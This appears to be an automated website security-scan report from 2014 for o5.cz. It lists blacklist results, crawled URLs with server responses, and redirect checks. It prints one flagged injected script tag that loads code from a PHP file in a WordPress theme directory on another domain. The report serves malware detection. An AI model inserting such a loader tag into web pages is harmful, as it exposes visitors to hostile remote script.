Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=o5.cz
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://o5.cz/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://o5.cz/ | 200 OK Content-Length: 19515 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://loxodonta.ro/domenii/8martie/wp-content/themes/twentyfourteen/grbkzjt6.php?id=9171264"></script> | ||
http://loxodonta.ro/domenii/8martie/wp-content/themes/twentyfourteen/grbkzjt6.php?id=9168486 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=600 Connection: close Date: Wed, 08 Oct 2014 05:25:17 GMT Location: http://www.loxodonta.ro/index.php?id=9168486 Server: nginx/1.6.0 Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 08 Oct 2014 05:35:17 GMT | clean |
http://www.loxodonta.ro/index.php?id=9168486 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=600 Connection: close Date: Wed, 08 Oct 2014 05:25:18 GMT Location: http://www.loxodonta.ro/?id=9168486 Server: nginx/1.6.0 Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 08 Oct 2014 05:35:18 GMT | clean |
http://www.loxodonta.ro/?id=9168486 | 200 OK Content-Length: 28294 Content-Type: text/html | clean |
http://www.loxodonta.ro/js/frontpage/jquery.js | 200 OK Content-Length: 92790 Content-Type: application/javascript | clean |
http://www.loxodonta.ro/js/frontpage/script.js | 200 OK Content-Length: 19693 Content-Type: application/javascript | clean |
http://www.loxodonta.ro/js/frontpage/script.responsive.js | 200 OK Content-Length: 7618 Content-Type: application/javascript | clean |
http://loxodonta.ro//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=600 Connection: close Date: Wed, 08 Oct 2014 05:25:20 GMT Location: http://www.loxodonta.ro/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: nginx/1.6.0 Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 08 Oct 2014 05:35:20 GMT | clean |
http://www.loxodonta.ro/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 500 Internal Server Error Content-Length: 1246 Content-Type: text/html | clean |
http://www.loxodonta.ro/test404page.js | 500 Internal Server Error Content-Length: 1246 Content-Type: text/html | clean |
http://www.e-mistic.org/sinaxar.js | 200 OK Content-Length: 575 Content-Type: text/plain | clean |
http://www.e-mistic.org/\'http://e-mistic.org/sinaxar.js?id=713\' | 200 OK Content-Length: 8234 Content-Type: text/html | clean |
http://www.e-mistic.org/index.html | 200 OK Content-Length: 15282 Content-Type: text/html | clean |
http://www.e-mistic.org/html/produse.html | 200 OK Content-Length: 11860 Content-Type: text/html | clean |
http://www.e-mistic.org/html/../index.html | 200 OK Content-Length: 15282 Content-Type: text/html | clean |
http://www.e-mistic.org/html/../html/produse.html | 200 OK Content-Length: 11860 Content-Type: text/html | clean |
http://www.e-mistic.org/html/../html/../index.html | 200 OK Content-Length: 15282 Content-Type: text/html | clean |
http://www.e-mistic.org/html/../html/../html/produse.html | 200 OK Content-Length: 11860 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: o5.cz
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 08 Oct 2014 05:25:17 GMT
Pragma: no-cache
Server: Apache/2
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0nqejgndnsq1fkeedrpb0rc5i1; path=/
GET / HTTP/1.1
Host: o5.cz
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 08 Oct 2014 05:25:17 GMT
Pragma: no-cache
Server: Apache/2
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0nqejgndnsq1fkeedrpb0rc5i1; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: o5.cz
Referer: http://www.google.com/search?q=o5.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: o5.cz
Referer: http://www.google.com/search?q=o5.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.